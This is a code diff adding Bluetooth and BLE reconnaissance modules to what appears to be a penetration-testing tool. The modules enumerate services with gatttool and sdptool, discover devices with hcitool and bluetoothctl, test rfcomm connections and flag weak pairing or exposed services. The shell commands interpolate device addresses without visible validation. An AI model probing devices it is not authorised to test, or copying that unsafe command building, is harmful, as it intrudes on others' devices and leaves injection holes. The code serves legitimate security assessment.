+    "00001811-0000-1000-8000-00805f9b34fb": "Alert Notification",
+    "00001812-0000-1000-8000-00805f9b34fb": "Human Interface Device",
+    "00001813-0000-1000-8000-00805f9b34fb": "Scan Parameters",
+    "00001814-0000-1000-8000-00805f9b34fb": "Running Speed and Cadence",
+    "00001815-0000-1000-8000-00805f9b34fb": "Automation IO",
+    "00001816-0000-1000-8000-00805f9b34fb": "Cycling Speed and Cadence",
+    "00001818-0000-1000-8000-00805f9b34fb": "Cycling Power",
+    "00001819-0000-1000-8000-00805f9b34fb": "Location and Navigation",
+    "0000181a-0000-1000-8000-00805f9b34fb": "Environmental Sensing",
+    "0000181b-0000-1000-8000-00805f9b34fb": "Body Composition",
+    "0000181c-0000-1000-8000-00805f9b34fb": "User Data",
+    "0000181d-0000-1000-8000-00805f9b34fb": "Weight Scale",
+    "0000181e-0000-1000-8000-00805f9b34fb": "Bond Management",
+    "0000181f-0000-1000-8000-00805f9b34fb": "Continuous Glucose Monitoring",
+    "00001820-0000-1000-8000-00805f9b34fb": "Internet Protocol Support",
+    "00001821-0000-1000-8000-00805f9b34fb": "Indoor Positioning",
+    "00001822-0000-1000-8000-00805f9b34fb": "Pulse Oximeter",
+    "00001823-0000-1000-8000-00805f9b34fb": "HTTP Proxy",
+    "00001824-0000-1000-8000-00805f9b34fb": "Transport Discovery",
+    "00001825-0000-1000-8000-00805f9b34fb": "Object Transfer",
+    "00001826-0000-1000-8000-00805f9b34fb": "Fitness Machine",
+    "00001827-0000-1000-8000-00805f9b34fb": "Mesh Provisioning",
+    "00001828-0000-1000-8000-00805f9b34fb": "Mesh Proxy",
+  }
+
+  /**
+   * Standard BLE characteristic UUIDs.
+   */
+  export const STANDARD_CHARACTERISTICS: Record<string, string> = {
+    "00002a00-0000-1000-8000-00805f9b34fb": "Device Name",
+    "00002a01-0000-1000-8000-00805f9b34fb": "Appearance",
+    "00002a02-0000-1000-8000-00805f9b34fb": "Peripheral Privacy Flag",
+    "00002a03-0000-1000-8000-00805f9b34fb": "Reconnection Address",
+    "00002a04-0000-1000-8000-00805f9b34fb": "Peripheral Preferred Connection Parameters",
+    "00002a05-0000-1000-8000-00805f9b34fb": "Service Changed",
+    "00002a06-0000-1000-8000-00805f9b34fb": "Alert Level",
+    "00002a07-0000-1000-8000-00805f9b34fb": "Tx Power Level",
+    "00002a19-0000-1000-8000-00805f9b34fb": "Battery Level",
+    "00002a23-0000-1000-8000-00805f9b34fb": "System ID",
+    "00002a24-0000-1000-8000-00805f9b34fb": "Model Number String",
+    "00002a25-0000-1000-8000-00805f9b34fb": "Serial Number String",
+    "00002a26-0000-1000-8000-00805f9b34fb": "Firmware Revision String",
+    "00002a27-0000-1000-8000-00805f9b34fb": "Hardware Revision String",
+    "00002a28-0000-1000-8000-00805f9b34fb": "Software Revision String",
+    "00002a29-0000-1000-8000-00805f9b34fb": "Manufacturer Name String",
+  }
+
+  // ========== Service Enumeration ==========
+
+  /**
+   * Enumerate BLE services using gatttool.
+   */
+  export async function enumerateServices(
+    address: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.BLEService[]> {
+    const services: WirelessScanTypes.BLEService[] = []
+
+    // Try gatttool primary services
+    const primaryResult = await execCommand(
+      `timeout 30 gatttool -b ${address} --primary 2>&1 || true`
+    )
+
+    if (primaryResult.stdout && !primaryResult.stdout.includes("error")) {
+      services.push(...parseGatttoolPrimary(primaryResult.stdout))
+    }
+
+    // Get characteristics for each service
+    for (const service of services) {
+      const charResult = await execCommand(
+        `timeout 30 gatttool -b ${address} --characteristics --start=${service.handle || "0x0001"} --end=0xffff 2>&1 || true`
+      )
+
+      if (charResult.stdout && !charResult.stdout.includes("error")) {
+        service.characteristics = parseGatttoolCharacteristics(charResult.stdout)
+      }
+    }
+
+    return services
+  }
+
+  /**
+   * Parse gatttool primary services output.
+   */
+  function parseGatttoolPrimary(output: string): WirelessScanTypes.BLEService[] {
+    const services: WirelessScanTypes.BLEService[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      // Format: attr handle: 0x0001, end grp handle: 0x000b uuid: 00001800-0000-1000-8000-00805f9b34fb
+      const match = line.match(
+        /attr handle:\s*(0x[0-9a-f]+).*?uuid:\s*([0-9a-f-]+)/i
+      )
+      if (match) {
+        const uuid = match[2].toLowerCase()
+        services.push({
+          uuid,
+          handle: parseInt(match[1], 16),
+          name: STANDARD_SERVICES[uuid],
+          primary: true,
+          characteristics: [],
+        })
+      }
+    }
+
+    return services
+  }
+
+  /**
+   * Parse gatttool characteristics output.
+   */
+  function parseGatttoolCharacteristics(
+    output: string
+  ): WirelessScanTypes.BLECharacteristic[] {
+    const characteristics: WirelessScanTypes.BLECharacteristic[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      // Format: handle: 0x0002, char properties: 0x02, char value handle: 0x0003, uuid: 00002a00-...
+      const match = line.match(
+        /handle:\s*(0x[0-9a-f]+).*?properties:\s*(0x[0-9a-f]+).*?uuid:\s*([0-9a-f-]+)/i
+      )
+      if (match) {
+        const uuid = match[3].toLowerCase()
+        const properties = parseInt(match[2], 16)
+
+        characteristics.push({
+          uuid,
+          handle: parseInt(match[1], 16),
+          name: STANDARD_CHARACTERISTICS[uuid],
+          properties: parseProperties(properties),
+          readable: Boolean(properties & 0x02),
+          writable: Boolean(properties & (0x04 | 0x08)),
+          notifiable: Boolean(properties & 0x10),
+        })
+      }
+    }
+
+    return characteristics
+  }
+
+  /**
+   * Parse characteristic properties byte.
+   */
+  function parseProperties(props: number): string[] {
+    const properties: string[] = []
+
+    if (props & 0x01) properties.push("broadcast")
+    if (props & 0x02) properties.push("read")
+    if (props & 0x04) properties.push("write-without-response")
+    if (props & 0x08) properties.push("write")
+    if (props & 0x10) properties.push("notify")
+    if (props & 0x20) properties.push("indicate")
+    if (props & 0x40) properties.push("authenticated-signed-writes")
+    if (props & 0x80) properties.push("extended-properties")
+
+    return properties
+  }
+
+  // ========== Service Analysis ==========
+
+  /**
+   * Analyze BLE services for security issues.
+   */
+  export function analyzeServices(
+    device: WirelessScanTypes.BluetoothDevice,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    for (const service of device.services) {
+      // Check for sensitive services
+      if (isSensitiveService(service.uuid)) {
+        findings.push({
+          id: WirelessScanStorage.createFindingId(),
+          scanId,
+          wirelessType: "bluetooth",
+          category: "privacy",
+          severity: "medium",
+          title: "Sensitive BLE Service Exposed",
+          description: `Device ${device.name || device.address} exposes the ${service.name || service.uuid} service which may leak sensitive information.`,
+          target: {
+            type: "device",
+            identifier: device.address,
+            name: device.name,
+          },
+          recommendation:
+            "Review if this service needs to be publicly accessible. Consider implementing authorization requirements.",
+          references: [],
+          falsePositive: false,
+          verified: false,
+          detectedAt: Date.now(),
+        })
+      }
+
+      // Check characteristics for write without authentication
+      for (const char of service.characteristics) {
+        if (char.writable && isSecurityRelevantChar(char.uuid)) {
+          findings.push({
+            id: WirelessScanStorage.createFindingId(),
+            scanId,
+            wirelessType: "bluetooth",
+            category: "authentication",
+            severity: "high",
+            title: "Writable Security-Relevant Characteristic",
+            description: `Device ${device.name || device.address} has a writable characteristic (${char.name || char.uuid}) that may allow unauthorized modifications.`,
+            target: {
+              type: "device",
+              identifier: device.address,
+              name: device.name,
+            },
+            recommendation:
+              "Implement proper authentication and authorization for write operations on sensitive characteristics.",
+            references: [],
+            falsePositive: false,
+            verified: false,
+            detectedAt: Date.now(),
+          })
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Check if a service is considered sensitive.
+   */
+  function isSensitiveService(uuid: string): boolean {
+    const sensitiveServices = [
+      "00001808-0000-1000-8000-00805f9b34fb", // Glucose
+      "00001809-0000-1000-8000-00805f9b34fb", // Health Thermometer
+      "0000180d-0000-1000-8000-00805f9b34fb", // Heart Rate
+      "00001810-0000-1000-8000-00805f9b34fb", // Blood Pressure
+      "0000181b-0000-1000-8000-00805f9b34fb", // Body Composition
+      "0000181c-0000-1000-8000-00805f9b34fb", // User Data
+      "0000181f-0000-1000-8000-00805f9b34fb", // Continuous Glucose Monitoring
+      "00001822-0000-1000-8000-00805f9b34fb", // Pulse Oximeter
+    ]
+
+    return sensitiveServices.includes(uuid.toLowerCase())
+  }
+
+  /**
+   * Check if a characteristic is security-relevant.
+   */
+  function isSecurityRelevantChar(uuid: string): boolean {
+    const securityChars = [
+      "00002a06-0000-1000-8000-00805f9b34fb", // Alert Level
+      "00002a02-0000-1000-8000-00805f9b34fb", // Peripheral Privacy Flag
+    ]
+
+    return securityChars.includes(uuid.toLowerCase())
+  }
+
+  // ========== Event Emission ==========
+
+  /**
+   * Emit BLE service found events.
+   */
+  export function emitServiceEvents(
+    device: WirelessScanTypes.BluetoothDevice,
+    scanId: string
+  ): void {
+    for (const service of device.services) {
+      Bus.publish(WirelessScanEvents.BLEServiceFound, {
+        scanId,
+        address: device.address,
+        uuid: service.uuid,
+        name: service.name,
+        characteristicsCount: service.characteristics.length,
+      })
+
+      for (const char of service.characteristics) {
+        Bus.publish(WirelessScanEvents.BLECharacteristicFound, {
+          scanId,
+          address: device.address,
+          serviceUuid: service.uuid,
+          uuid: char.uuid,
+          properties: char.properties,
+        })
+      }
+    }
+  }
+
+  // ========== Service Name Resolution ==========
+
+  /**
+   * Get service name from UUID.
+   */
+  export function getServiceName(uuid: string): string | undefined {
+    return STANDARD_SERVICES[uuid.toLowerCase()]
+  }
+
+  /**
+   * Get characteristic name from UUID.
+   */
+  export function getCharacteristicName(uuid: string): string | undefined {
+    return STANDARD_CHARACTERISTICS[uuid.toLowerCase()]
+  }
+
+  /**
+   * Check if UUID is a standard Bluetooth SIG UUID.
+   */
+  export function isStandardUUID(uuid: string): boolean {
+    return uuid.toLowerCase().endsWith("-0000-1000-8000-00805f9b34fb")
+  }
+
+  /**
+   * Extract 16-bit UUID from full 128-bit UUID.
+   */
+  export function extractShortUUID(uuid: string): string {
+    const match = uuid.match(/^0000([0-9a-f]{4})-/i)
+    return match ? `0x${match[1].toUpperCase()}` : uuid
+  }
+
+  // ========== Statistics ==========
+
+  /**
+   * Get BLE statistics for a device.
+   */
+  export function getStats(device: WirelessScanTypes.BluetoothDevice): {
+    serviceCount: number
+    characteristicCount: number
+    readableCount: number
+    writableCount: number
+    notifiableCount: number
+    standardServices: number
+    customServices: number
+  } {
+    let characteristicCount = 0
+    let readableCount = 0
+    let writableCount = 0
+    let notifiableCount = 0
+    let standardServices = 0
+    let customServices = 0
+
+    for (const service of device.services) {
+      if (isStandardUUID(service.uuid)) {
+        standardServices++
+      } else {
+        customServices++
+      }
+
+      for (const char of service.characteristics) {
+        characteristicCount++
+        if (char.readable) readableCount++
+        if (char.writable) writableCount++
+        if (char.notifiable) notifiableCount++
+      }
+    }
+
+    return {
+      serviceCount: device.services.length,
+      characteristicCount,
+      readableCount,
+      writableCount,
+      notifiableCount,
+      standardServices,
+      customServices,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/bluetooth/classic.ts b/packages/opencode/src/pentest/wirelessscan/bluetooth/classic.ts
new file mode 100644
index 00000000000..260de2e2697
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/bluetooth/classic.ts
@@ -0,0 +1,387 @@
+/**
+ * @fileoverview Classic Bluetooth Analysis
+ *
+ * Classic Bluetooth (BR/EDR) security analysis and service enumeration.
+ *
+ * @module pentest/wirelessscan/bluetooth/classic
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+
+/**
+ * Classic Bluetooth analysis namespace.
+ */
+export namespace BluetoothClassic {
+  // ========== Service Discovery ==========
+
+  /**
+   * Discovered classic Bluetooth service.
+   */
+  export interface ClassicService {
+    name: string
+    protocol: string
+    channel?: number
+    uuid?: string
+    profileDescriptor?: string
+  }
+
+  /**
+   * Discover services using sdptool.
+   */
+  export async function discoverServices(
+    address: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<ClassicService[]> {
+    const result = await execCommand(
+      `timeout 30 sdptool browse ${address} 2>&1 || true`
+    )
+
+    if (!result.stdout || result.stdout.includes("error")) {
+      return []
+    }
+
+    return parseSdptoolBrowse(result.stdout)
+  }
+
+  /**
+   * Parse sdptool browse output.
+   */
+  function parseSdptoolBrowse(output: string): ClassicService[] {
+    const services: ClassicService[] = []
+    const serviceBlocks = output.split(/Service Name:/)
+
+    for (const block of serviceBlocks.slice(1)) {
+      const lines = block.split("\n")
+      const service: ClassicService = {
+        name: lines[0]?.trim() || "Unknown",
+        protocol: "Unknown",
+      }
+
+      for (const line of lines) {
+        const trimmed = line.trim()
+
+        if (trimmed.startsWith("Protocol Descriptor")) {
+          const protoMatch = trimmed.match(/Protocol Descriptor.*?"([^"]+)"/)
+          if (protoMatch) {
+            service.protocol = protoMatch[1]
+          }
+        } else if (trimmed.includes("Channel:")) {
+          const channelMatch = trimmed.match(/Channel:\s*(\d+)/)
+          if (channelMatch) {
+            service.channel = parseInt(channelMatch[1], 10)
+          }
+        } else if (trimmed.startsWith("Service RecHandle:")) {
+          const uuidMatch = block.match(/Service Class ID.*?UUID.*?(0x[0-9a-f]+)/i)
+          if (uuidMatch) {
+            service.uuid = uuidMatch[1]
+          }
+        } else if (trimmed.includes("Profile Descriptor")) {
+          const profileMatch = trimmed.match(/Profile Descriptor.*?"([^"]+)"/)
+          if (profileMatch) {
+            service.profileDescriptor = profileMatch[1]
+          }
+        }
+      }
+
+      services.push(service)
+    }
+
+    return services
+  }
+
+  // ========== Security Analysis ==========
+
+  /**
+   * Analyze classic Bluetooth device for security issues.
+   */
+  export function analyzeDevice(
+    device: WirelessScanTypes.BluetoothDevice,
+    services: ClassicService[],
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    // Check for legacy pairing
+    if (device.legacyPairing) {
+      findings.push({
+        id: WirelessScanStorage.createFindingId(),
+        scanId,
+        wirelessType: "bluetooth",
+        category: "authentication",
+        severity: "medium",
+        title: "Legacy Pairing Supported",
+        description: `Device ${device.name || device.address} supports legacy Bluetooth pairing which is vulnerable to PIN cracking and man-in-the-middle attacks.`,
+        target: {
+          type: "device",
+          identifier: device.address,
+          name: device.name,
+        },
+        vulnerability: "Legacy Bluetooth Pairing",
+        recommendation:
+          "Use Secure Simple Pairing (SSP) with numeric comparison or passkey entry. Avoid using Just Works pairing in sensitive environments.",
+        references: [
+          "https://www.bluetooth.com/specifications/specs/core-specification/",
+        ],
+        falsePositive: false,
+        verified: false,
+        detectedAt: Date.now(),
+      })
+    }
+
+    // Check for sensitive services
+    for (const service of services) {
+      const finding = analyzeService(device, service, scanId)
+      if (finding) {
+        findings.push(finding)
+      }
+    }
+
+    // Check discoverable status
+    if (device.paired === false && device.connected === false) {
+      // Device is discoverable
+      findings.push({
+        id: WirelessScanStorage.createFindingId(),
+        scanId,
+        wirelessType: "bluetooth",
+        category: "configuration",
+        severity: "low",
+        title: "Bluetooth Device Discoverable",
+        description: `Device ${device.name || device.address} is discoverable, making it visible to all nearby Bluetooth devices.`,
+        target: {
+          type: "device",
+          identifier: device.address,
+          name: device.name,
+        },
+        recommendation:
+          "Set device to non-discoverable mode when not actively pairing. Most devices should only be discoverable during initial setup.",
+        references: [],
+        falsePositive: false,
+        verified: false,
+        detectedAt: Date.now(),
+      })
+    }
+
+    return findings
+  }
+
+  /**
+   * Analyze a specific service for security issues.
+   */
+  function analyzeService(
+    device: WirelessScanTypes.BluetoothDevice,
+    service: ClassicService,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding | null {
+    const sensitiveServices: Record<string, { severity: WirelessScanTypes.Severity; message: string }> = {
+      "OBEX Object Push": {
+        severity: "medium",
+        message: "allows file transfer which could be exploited for data exfiltration or malware delivery",
+      },
+      "OBEX File Transfer": {
+        severity: "medium",
+        message: "provides file system access which could leak sensitive data",
+      },
+      "Serial Port": {
+        severity: "medium",
+        message: "provides serial communication which may expose device control interfaces",
+      },
+      "Headset": {
+        severity: "low",
+        message: "allows audio streaming which could be used for eavesdropping if compromised",
+      },
+      "Handsfree": {
+        severity: "low",
+        message: "provides telephony features that could be abused",
+      },
+      "Network Access Point": {
+        severity: "high",
+        message: "provides network access which could bypass network security controls",
+      },
+      "PAN User": {
+        severity: "medium",
+        message: "enables personal area networking which could be exploited for network attacks",
+      },
+    }
+
+    const info = sensitiveServices[service.name]
+    if (!info) return null
+
+    return {
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "bluetooth",
+      category: "configuration",
+      severity: info.severity,
+      title: `Exposed ${service.name} Service`,
+      description: `Device ${device.name || device.address} exposes the ${service.name} service which ${info.message}.`,
+      target: {
+        type: "device",
+        identifier: device.address,
+        name: device.name,
+      },
+      recommendation: `Review if the ${service.name} service is required. Disable unnecessary services to reduce attack surface.`,
+      references: [],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  // ========== Connection Testing ==========
+
+  /**
+   * Test if a device accepts connections.
+   */
+  export async function testConnection(
+    address: string,
+    channel: number,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<{ connectable: boolean; error?: string }> {
+    const result = await execCommand(
+      `timeout 10 rfcomm connect hci0 ${address} ${channel} 2>&1 & sleep 5; rfcomm release 0 2>/dev/null || true`
+    )
+
+    const connectable = !result.stdout.includes("error") && !result.stdout.includes("refused")
+
+    return {
+      connectable,
+      error: connectable ? undefined : result.stdout,
+    }
+  }
+
+  // ========== Pairing Analysis ==========
+
+  /**
+   * Pairing security level.
+   */
+  export type PairingSecurityLevel =
+    | "mode1_level1" // No security
+    | "mode1_level2" // Unauthenticated pairing
+    | "mode1_level3" // Authenticated pairing
+    | "mode1_level4" // Authenticated LE Secure Connections
+    | "unknown"
+
+  /**
+   * Determine pairing security level.
+   */
+  export function determinePairingLevel(
+    device: WirelessScanTypes.BluetoothDevice
+  ): PairingSecurityLevel {
+    if (device.legacyPairing === true) {
+      return "mode1_level2" // Legacy pairing is unauthenticated
+    }
+
+    if (device.paired) {
+      return "mode1_level3" // Assume authenticated if paired
+    }
+
+    return "unknown"
+  }
+
+  /**
+   * Get security level description.
+   */
+  export function getSecurityLevelDescription(
+    level: PairingSecurityLevel
+  ): string {
+    const descriptions: Record<PairingSecurityLevel, string> = {
+      mode1_level1: "No security - no authentication or encryption",
+      mode1_level2: "Unauthenticated pairing with encryption",
+      mode1_level3: "Authenticated pairing with encryption",
+      mode1_level4: "Authenticated LE Secure Connections pairing with encryption",
+      unknown: "Security level could not be determined",
+    }
+
+    return descriptions[level]
+  }
+
+  // ========== Device Class Analysis ==========
+
+  /**
+   * Get device type from class.
+   */
+  export function getDeviceType(
+    deviceClass?: WirelessScanTypes.BluetoothClass
+  ): string {
+    if (!deviceClass) return "Unknown"
+
+    const types: Record<string, string[]> = {
+      "Computer": ["Desktop", "Server", "Laptop", "Handheld", "Palm-size", "Wearable"],
+      "Phone": ["Cellular", "Cordless", "Smartphone", "Modem/Gateway", "ISDN"],
+      "LAN/Network Access Point": ["Fully available", "1-17% utilized", "17-33%", "33-50%", "50-67%", "67-83%", "83-99%", "No service"],
+      "Audio/Video": ["Headset", "Hands-free", "Microphone", "Loudspeaker", "Headphones", "Portable Audio", "Car Audio", "Set-top Box", "HiFi Audio", "VCR", "Video Camera", "Camcorder", "Video Monitor", "Video Display", "Gaming/Toy"],
+      "Peripheral": ["Keyboard", "Pointing Device", "Combo Keyboard/Pointing", "Joystick", "Gamepad", "Remote Control", "Sensing Device", "Digitizer", "Card Reader"],
+      "Imaging": ["Display", "Camera", "Scanner", "Printer"],
+      "Wearable": ["Wristwatch", "Pager", "Jacket", "Helmet", "Glasses"],
+      "Toy": ["Robot", "Vehicle", "Doll/Action Figure", "Controller", "Game"],
+      "Health": ["Blood Pressure", "Thermometer", "Weighing Scale", "Glucose Meter", "Pulse Oximeter", "Heart/Pulse Rate", "Health Data Display", "Step Counter", "Body Composition Analyzer", "Peak Flow", "Medication Monitor", "Knee Prosthesis", "Ankle Prosthesis", "Generic Health Manager", "Personal Mobility"],
+    }
+
+    const majorType = types[deviceClass.major]
+    if (majorType) {
+      const minorIndex = parseInt(deviceClass.minor, 16)
+      return majorType[minorIndex] || deviceClass.major
+    }
+
+    return deviceClass.major
+  }
+
+  // ========== Statistics ==========
+
+  /**
+   * Get classic Bluetooth statistics.
+   */
+  export function getStats(
+    devices: WirelessScanTypes.BluetoothDevice[],
+    services: Map<string, ClassicService[]>
+  ): {
+    totalDevices: number
+    paired: number
+    unpaired: number
+    legacyPairing: number
+    byType: Record<string, number>
+    totalServices: number
+    sensitiveServices: number
+  } {
+    const byType: Record<string, number> = {}
+    let paired = 0
+    let legacyPairing = 0
+    let totalServices = 0
+    let sensitiveServices = 0
+
+    const sensitiveServiceNames = [
+      "OBEX Object Push",
+      "OBEX File Transfer",
+      "Serial Port",
+      "Network Access Point",
+      "PAN User",
+    ]
+
+    for (const device of devices) {
+      // Count by type
+      const type = getDeviceType(device.deviceClass)
+      byType[type] = (byType[type] || 0) + 1
+
+      if (device.paired) paired++
+      if (device.legacyPairing) legacyPairing++
+
+      // Count services
+      const deviceServices = services.get(device.address) || []
+      totalServices += deviceServices.length
+      sensitiveServices += deviceServices.filter((s) =>
+        sensitiveServiceNames.includes(s.name)
+      ).length
+    }
+
+    return {
+      totalDevices: devices.length,
+      paired,
+      unpaired: devices.length - paired,
+      legacyPairing,
+      byType,
+      totalServices,
+      sensitiveServices,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/bluetooth/discovery.ts b/packages/opencode/src/pentest/wirelessscan/bluetooth/discovery.ts
new file mode 100644
index 00000000000..723b2075bb1
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/bluetooth/discovery.ts
@@ -0,0 +1,551 @@
+/**
+ * @fileoverview Bluetooth Device Discovery
+ *
+ * Functions for discovering Bluetooth devices using hcitool,
+ * bluetoothctl, and other tools.
+ *
+ * @module pentest/wirelessscan/bluetooth/discovery
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "wirelessscan.bluetooth.discovery" })
+
+/**
+ * Bluetooth discovery namespace.
+ */
+export namespace BluetoothDiscovery {
+  // ========== Interface Detection ==========
+
+  /**
+   * Detect Bluetooth interfaces.
+   */
+  export async function detectInterfaces(
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<
+    {
+      name: string
+      address: string
+      type: "classic" | "ble" | "dual"
+      up: boolean
+    }[]
+  > {
+    const interfaces: {
+      name: string
+      address: string
+      type: "classic" | "ble" | "dual"
+      up: boolean
+    }[] = []
+
+    // Try hciconfig
+    const hciResult = await execCommand("hciconfig -a 2>/dev/null || true")
+    if (hciResult.stdout) {
+      interfaces.push(...parseHciconfig(hciResult.stdout))
+    }
+
+    // Try bluetoothctl
+    if (interfaces.length === 0) {
+      const btctlResult = await execCommand(
+        'bluetoothctl list 2>/dev/null || echo ""'
+      )
+      if (btctlResult.stdout) {
+        interfaces.push(...parseBluetoothctlList(btctlResult.stdout))
+      }
+    }
+
+    return interfaces
+  }
+
+  /**
+   * Parse hciconfig output.
+   */
+  function parseHciconfig(output: string): {
+    name: string
+    address: string
+    type: "classic" | "ble" | "dual"
+    up: boolean
+  }[] {
+    const interfaces: {
+      name: string
+      address: string
+      type: "classic" | "ble" | "dual"
+      up: boolean
+    }[] = []
+
+    const blocks = output.split(/(?=hci\d+:)/)
+
+    for (const block of blocks) {
+      const nameMatch = block.match(/^(hci\d+):/)
+      if (!nameMatch) continue
+
+      const addrMatch = block.match(/BD Address:\s*([0-9A-Fa-f:]{17})/)
+      const upMatch = block.includes("UP RUNNING")
+
+      // Check for LE support
+      const hasLE = block.includes("LE") || block.includes("Low Energy")
+      const hasBR = block.includes("BR/EDR") || block.includes("ACL")
+
+      let type: "classic" | "ble" | "dual"
+      if (hasLE && hasBR) {
+        type = "dual"
+      } else if (hasLE) {
+        type = "ble"
+      } else {
+        type = "classic"
+      }
+
+      interfaces.push({
+        name: nameMatch[1],
+        address: addrMatch?.[1]?.toUpperCase() || "",
+        type,
+        up: upMatch,
+      })
+    }
+
+    return interfaces
+  }
+
+  /**
+   * Parse bluetoothctl list output.
+   */
+  function parseBluetoothctlList(output: string): {
+    name: string
+    address: string
+    type: "classic" | "ble" | "dual"
+    up: boolean
+  }[] {
+    const interfaces: {
+      name: string
+      address: string
+      type: "classic" | "ble" | "dual"
+      up: boolean
+    }[] = []
+
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const match = line.match(/Controller\s+([0-9A-Fa-f:]{17})\s+(.*)/)
+      if (match) {
+        interfaces.push({
+          name: "hci0", // bluetoothctl doesn't show interface name
+          address: match[1].toUpperCase(),
+          type: "dual", // Assume dual mode for modern adapters
+          up: true,
+        })
+      }
+    }
+
+    return interfaces
+  }
+
+  // ========== Classic Bluetooth Scanning ==========
+
+  /**
+   * Scan for classic Bluetooth devices using hcitool.
+   */
+  export async function scanClassic(
+    duration: number,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.BluetoothDevice[]> {
+    log.debug("Starting classic Bluetooth scan", { duration })
+
+    const devices: WirelessScanTypes.BluetoothDevice[] = []
+
+    // Standard inquiry scan
+    const scanResult = await execCommand(
+      `timeout ${duration} hcitool scan --flush 2>&1 || true`
+    )
+
+    if (scanResult.stdout) {
+      devices.push(...parseHcitoolScan(scanResult.stdout))
+    }
+
+    // Get additional info for each device
+    for (const device of devices) {
+      // Try to get device class
+      const infoResult = await execCommand(
+        `hcitool info ${device.address} 2>/dev/null || true`
+      )
+      if (infoResult.stdout) {
+        const classMatch = infoResult.stdout.match(/Class:\s*(0x[0-9A-Fa-f]+)/)
+        if (classMatch) {
+          device.deviceClass = parseDeviceClass(classMatch[1])
+        }
+      }
+    }
+
+    return devices
+  }
+
+  /**
+   * Parse hcitool scan output.
+   */
+  function parseHcitoolScan(output: string): WirelessScanTypes.BluetoothDevice[] {
+    const devices: WirelessScanTypes.BluetoothDevice[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      // Format: XX:XX:XX:XX:XX:XX DeviceName
+      const match = line.match(/^\s*([0-9A-Fa-f:]{17})\s+(.*)$/)
+      if (match) {
+        devices.push({
+          id: WirelessScanStorage.createDeviceId(),
+          address: match[1].toUpperCase(),
+          name: match[2].trim() || undefined,
+          type: "classic",
+          services: [],
+          serviceUuids: [],
+          uuids: [],
+          paired: false,
+          connected: false,
+          trusted: false,
+          blocked: false,
+          firstSeen: Date.now(),
+          lastSeen: Date.now(),
+        })
+      }
+    }
+
+    return devices
+  }
+
+  // ========== BLE Scanning ==========
+
+  /**
+   * Scan for BLE devices using hcitool lescan or bluetoothctl.
+   */
+  export async function scanBLE(
+    duration: number,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.BluetoothDevice[]> {
+    log.debug("Starting BLE scan", { duration })
+
+    const devices = new Map<string, WirelessScanTypes.BluetoothDevice>()
+
+    // Try hcitool lescan
+    const lescanResult = await execCommand(
+      `timeout ${duration} hcitool lescan --duplicates 2>&1 || true`
+    )
+
+    if (lescanResult.stdout && !lescanResult.stdout.includes("not available")) {
+      for (const device of parseHcitoolLescan(lescanResult.stdout)) {
+        devices.set(device.address, device)
+      }
+    }
+
+    // Also try bluetoothctl scan
+    const btctlResult = await execCommand(
+      `timeout ${duration} bluetoothctl --timeout ${duration} scan on 2>&1; bluetoothctl devices 2>/dev/null || true`
+    )
+
+    if (btctlResult.stdout) {
+      for (const device of parseBluetoothctlDevices(btctlResult.stdout)) {
+        if (!devices.has(device.address)) {
+          devices.set(device.address, device)
+        }
+      }
+    }
+
+    return Array.from(devices.values())
+  }
+
+  /**
+   * Parse hcitool lescan output.
+   */
+  function parseHcitoolLescan(output: string): WirelessScanTypes.BluetoothDevice[] {
+    const devices = new Map<string, WirelessScanTypes.BluetoothDevice>()
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      // Format: XX:XX:XX:XX:XX:XX DeviceName or (unknown)
+      const match = line.match(/([0-9A-Fa-f:]{17})\s+(.*)/)
+      if (match) {
+        const address = match[1].toUpperCase()
+        const name = match[2].trim()
+
+        if (!devices.has(address)) {
+          devices.set(address, {
+            id: WirelessScanStorage.createDeviceId(),
+            address,
+            name: name !== "(unknown)" ? name : undefined,
+            type: "ble",
+            services: [],
+            serviceUuids: [],
+            uuids: [],
+            paired: false,
+            connected: false,
+            trusted: false,
+            blocked: false,
+            firstSeen: Date.now(),
+            lastSeen: Date.now(),
+          })
+        } else if (name !== "(unknown)" && !devices.get(address)!.name) {
+          devices.get(address)!.name = name
+        }
+      }
+    }
+
+    return Array.from(devices.values())
+  }
+
+  /**
+   * Parse bluetoothctl devices output.
+   */
+  function parseBluetoothctlDevices(output: string): WirelessScanTypes.BluetoothDevice[] {
+    const devices: WirelessScanTypes.BluetoothDevice[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      // Format: Device XX:XX:XX:XX:XX:XX DeviceName
+      const match = line.match(/Device\s+([0-9A-Fa-f:]{17})\s+(.*)/)
+      if (match) {
+        devices.push({
+          id: WirelessScanStorage.createDeviceId(),
+          address: match[1].toUpperCase(),
+          name: match[2].trim() || undefined,
